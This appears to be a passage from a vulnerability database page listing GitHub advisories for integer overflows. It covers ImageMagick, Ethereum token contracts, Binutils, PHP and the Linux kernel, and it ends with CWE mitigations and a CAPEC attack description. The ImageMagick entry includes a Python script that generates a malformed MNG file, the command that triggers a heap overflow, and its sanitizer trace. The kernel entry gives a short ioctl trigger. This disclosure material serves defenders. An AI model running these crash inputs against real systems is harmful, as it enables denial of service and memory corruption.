chunk\nihdr_data = struct.pack(\u0027\u003eIIBBBBB\u0027, ihdr_width, ihdr_height, 8, 0, 0, 0, 0)\nihdr_chunk = create_chunk(b\u0027IHDR\u0027, ihdr_data)\n\n# IDAT chunk (Minimal data for W x H grayscale pixels)\nscanline = b\u0027\\x00\u0027 + (b\u0027\\x00\u0027 * ihdr_width)\ncompressed_scanline = zlib.compress(scanline)\nidat_chunk = create_chunk(b\u0027IDAT\u0027, compressed_scanline)\n\n# IEND chunk\niend_chunk = create_chunk(b\u0027IEND\u0027, b\u0027\u0027)\n\n# MEND chunk\nmend_chunk = create_chunk(b\u0027MEND\u0027, b\u0027\u0027)\n\nprogram_input = (\n mng_signature +\n mhdr_chunk +\n magn_chunk +\n ihdr_chunk +\n idat_chunk +\n iend_chunk +\n mend_chunk\n)\n\nprint(f\"Generated MNG size: {len(program_input)} bytes\")\nwith open(\"magn_write.mng\", \"wb\") as tmp:\n tmp.write(program_input)\n```\n\n### **Command**\n\n```shell\npython3 ./generate_testcase.py\nutilities/magick ./magn_write.mng -resize 200x200 PNG:output.png\n```\n\n### **ASan Backtrace**\n\n```\n=================================================================\n==585863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f80849757d0 at pc 0x55744124fba3 bp 0x7fff1300ddf0 sp 0x7fff1300dde8\nWRITE of size 4 at 0x7f80849757d0 thread T0\n #0 0x55744124fba2 in SetPixelRed /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:913:52\n #1 0x55744123be16 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6657:27\n #2 0x557441222c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9\n #3 0x557441347da1 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15\n #4 0x55744134ad96 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9\n #5 0x5574419135fc in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4959:22\n #6 0x55744190748c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5473:7\n #7 0x5574417dd25b in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13\n #8 0x5574417de629 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5\n #9 0x5574417daf9c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14\n #10 0x557440e237b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10\n #11 0x557440e231e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10\n #12 0x7f8087433ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16\n #13 0x7f8087433d64 in __libc_start_main csu/../csu/libc-start.c:360:3\n #14 0x557440d3f790 in _start (/tmp/repro/imagemagick/utilities/magick+0x1f2790) (BuildId: 926b2c12732f27a214dada191ea6277c7b553ea5)\n\n0x7f80849757d0 is located 48 bytes before 1572816-byte region [0x7f8084975800,0x7f8084af57d0)\nallocated by thread T0 here:\n #0 0x557440de00cb in posix_memalign (/tmp/repro/imagemagick/utilities/magick+0x2930cb) (BuildId: 926b2c12732f27a214dada191ea6277c7b553ea5)\n #1 0x557440e58aa6 in AcquireAlignedMemory_POSIX /tmp/repro/imagemagick/MagickCore/memory.c:300:7\n #2 0x557440e5885d in AcquireAlignedMemory /tmp/repro/imagemagick/MagickCore/memory.c:378:10\n #3 0x5574412e9725 in OpenPixelCache /tmp/repro/imagemagick/MagickCore/cache.c:3775:46\n #4 0x5574412eead7 in GetImagePixelCache /tmp/repro/imagemagick/MagickCore/cache.c:1782:18\n #5 0x5574412ef71b in SyncImagePixelCache /tmp/repro/imagemagick/MagickCore/cache.c:5600:28\n #6 0x557440e2e786 in SetImageStorageClass /tmp/repro/imagemagick/MagickCore/image.c:2617:10\n #7 0x557440e2f075 in SetImageBackgroundColor /tmp/repro/imagemagick/MagickCore/image.c:2422:7\n #8 0x55744123b3d6 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6560:28\n #9 0x557441222c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9\n #10 0x557441347da1 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15\n #11 0x55744134ad96 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9\n #12 0x5574419135fc in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4959:22\n #13 0x55744190748c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5473:7\n #14 0x5574417dd25b in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13\n #15 0x5574417de629 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5\n #16 0x5574417daf9c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14\n #17 0x557440e237b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10\n #18 0x557440e231e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10\n #19 0x7f8087433ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:913:52 in SetPixelRed\nShadow bytes around the buggy address:\n 0x7f8084975500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7f8084975580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7f8084975600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7f8084975680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7f8084975700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n=\u003e0x7f8084975780: fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa\n 0x7f8084975800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7f8084975880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7f8084975900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7f8084975980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7f8084975a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n==585863==ABORTING\n```\n\n## **Reporter Credit**\n\nGoogle Big Sleep",
"id": "GHSA-qp29-wxp5-wh82",
"modified": "2025-11-04T16:20:46Z",
"published": "2025-08-25T16:23:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qp29-wxp5-wh82"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55154"
},
{
"type": "PACKAGE",
"url": "https://github.com/ImageMagick/ImageMagick"
},
{
"type": "WEB",
"url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.0"
},
{
"type": "WEB",
"url": "https://issuetracker.google.com/savedsearches/7155917"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "imagemagick: integer overflows in MNG magnification"
}
GHSA-QP4G-2WV5-9V4M
Vulnerability from github – Published: 2022-05-14 03:04 – Updated: 2022-05-14 03:04MoxyOnePresale is a smart contract running on Ethereum. The mint function has an integer overflow that allows minted tokens to be arbitrarily retrieved by the contract owner.
{
"affected": [],
"aliases": [
"CVE-2018-13126"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-07-04T00:29:00Z",
"severity": "HIGH"
},
"details": "MoxyOnePresale is a smart contract running on Ethereum. The mint function has an integer overflow that allows minted tokens to be arbitrarily retrieved by the contract owner.",
"id": "GHSA-qp4g-2wv5-9v4m",
"modified": "2022-05-14T03:04:49Z",
"published": "2022-05-14T03:04:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-13126"
},
{
"type": "WEB",
"url": "https://github.com/dwfault/AirTokens/blob/master/SPXToken/mint%20interger%20overflow.md"
},
{
"type": "WEB",
"url": "https://github.com/dwfault/AirTokens/tree/master/MoxyOnePresale"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-QP5Q-3JM8-4774
Vulnerability from github – Published: 2022-05-13 01:30 – Updated: 2022-05-13 01:30In GNU Binutils 2.30, there's an integer overflow in the function load_specific_debug_section() in objdump.c, which results in malloc() with 0 size. A crafted ELF file allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact.
{
"affected": [],
"aliases": [
"CVE-2018-6543"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-02-02T09:29:00Z",
"severity": "HIGH"
},
"details": "In GNU Binutils 2.30, there\u0027s an integer overflow in the function load_specific_debug_section() in objdump.c, which results in `malloc()` with 0 size. A crafted ELF file allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact.",
"id": "GHSA-qp5q-3jm8-4774",
"modified": "2022-05-13T01:30:46Z",
"published": "2022-05-13T01:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-6543"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201811-17"
},
{
"type": "WEB",
"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=22769"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00072.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00008.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/102985"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-QPQ5-C659-XF5G
Vulnerability from github – Published: 2022-05-14 03:02 – Updated: 2022-05-14 03:02The mintToken function of a smart contract implementation for Martcoin, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.
{
"affected": [],
"aliases": [
"CVE-2018-13633"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-07-09T06:29:00Z",
"severity": "HIGH"
},
"details": "The mintToken function of a smart contract implementation for Martcoin, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.",
"id": "GHSA-qpq5-c659-xf5g",
"modified": "2022-05-14T03:02:08Z",
"published": "2022-05-14T03:02:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-13633"
},
{
"type": "WEB",
"url": "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md"
},
{
"type": "WEB",
"url": "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/Martcoin"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-QPXH-X584-WP5R
Vulnerability from github – Published: 2022-05-17 03:54 – Updated: 2022-05-17 03:54Integer overflow in the xml_utf8_encode function in ext/xml/xml.c in PHP before 7.0.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long argument to the utf8_encode function, leading to a heap-based buffer overflow.
{
"affected": [],
"aliases": [
"CVE-2016-4344"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-05-22T01:59:00Z",
"severity": "CRITICAL"
},
"details": "Integer overflow in the xml_utf8_encode function in ext/xml/xml.c in PHP before 7.0.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long argument to the utf8_encode function, leading to a heap-based buffer overflow.",
"id": "GHSA-qpxh-x584-wp5r",
"modified": "2022-05-17T03:54:54Z",
"published": "2022-05-17T03:54:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4344"
},
{
"type": "WEB",
"url": "https://bugs.php.net/bug.php?id=71637"
},
{
"type": "WEB",
"url": "http://php.net/ChangeLog-7.php"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2016/04/28/2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-QQCR-57GP-2JMQ
Vulnerability from github – Published: 2024-10-21 18:30 – Updated: 2026-07-14 15:31In the Linux kernel, the following vulnerability has been resolved:
block: fix integer overflow in BLKSECDISCARD
I independently rediscovered
commit 22d24a544b0d49bbcbd61c8c0eaf77d3c9297155
block: fix overflow in blk_ioctl_discard()
but for secure erase.
Same problem:
uint64_t r[2] = {512, 18446744073709551104ULL};
ioctl(fd, BLKSECDISCARD, r);
will enter near infinite loop inside blkdev_issue_secure_erase():
a.out: attempt to access beyond end of device
loop0: rw=5, sector=3399043073, nr_sectors = 1024 limit=2048
bio_check_eod: 3286214 callbacks suppressed
{
"affected": [],
"aliases": [
"CVE-2024-49994"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-21T18:15:19Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: fix integer overflow in BLKSECDISCARD\n\nI independently rediscovered\n\n\tcommit 22d24a544b0d49bbcbd61c8c0eaf77d3c9297155\n\tblock: fix overflow in blk_ioctl_discard()\n\nbut for secure erase.\n\nSame problem:\n\n\tuint64_t r[2] = {512, 18446744073709551104ULL};\n\tioctl(fd, BLKSECDISCARD, r);\n\nwill enter near infinite loop inside blkdev_issue_secure_erase():\n\n\ta.out: attempt to access beyond end of device\n\tloop0: rw=5, sector=3399043073, nr_sectors = 1024 limit=2048\n\tbio_check_eod: 3286214 callbacks suppressed",
"id": "GHSA-qqcr-57gp-2jmq",
"modified": "2026-07-14T15:31:15Z",
"published": "2024-10-21T18:30:59Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49994"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-019113.html"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/0842ddd83939eb4db940b9af7d39e79722bc41aa"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/697ba0b6ec4ae04afb67d3911799b5e2043b4455"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/6c9915fa9410cbb9bd75ee283c03120046c56d3d"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/8476f8428e8b48fd7a0e4258fa2a96a8f4468239"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/a99bacb35c1416355eef957560e8fcac3a665549"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00001.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-QQJR-5X5P-HMJ2
Vulnerability from github – Published: 2022-05-14 03:13 – Updated: 2022-05-14 03:13The mintToken function of a smart contract implementation for TheFlashToken, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.
{
"affected": [],
"aliases": [
"CVE-2018-13772"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-07-09T06:29:00Z",
"severity": "HIGH"
},
"details": "The mintToken function of a smart contract implementation for TheFlashToken, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.",
"id": "GHSA-qqjr-5x5p-hmj2",
"modified": "2022-05-14T03:13:49Z",
"published": "2022-05-14T03:13:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-13772"
},
{
"type": "WEB",
"url": "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md"
},
{
"type": "WEB",
"url": "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/TheFlashToken"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
Ensure that all protocols are strictly defined, such that all out-of-bounds behavior can be identified simply, and require strict conformance to the protocol.
Mitigation MIT-3
Strategy: Language Selection
- Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- If possible, choose a language or compiler that performs automatic bounds checking.
Mitigation MIT-4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
- Use libraries or frameworks that make it easier to handle numbers without unexpected consequences.
- Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). [REF-106]
Mitigation MIT-8
Strategy: Input Validation
- Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range.
- Use unsigned integers where possible. This makes it easier to perform validation for integer overflows. When signed integers are required, ensure that the range check includes minimum values as well as maximum values.
Mitigation MIT-36
- Understand the programming language's underlying representation and how it interacts with numeric calculation (CWE-681). Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, "not-a-number" calculations, and how the language handles numbers that are too large or too small for its underlying representation. [REF-7]
- Also be careful to account for 32-bit, 64-bit, and other potential differences that may affect the numeric representation.
Mitigation MIT-15
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Mitigation MIT-26
Strategy: Compilation or Build Hardening
Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system.
CAPEC-92: Forced Integer Overflow
This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.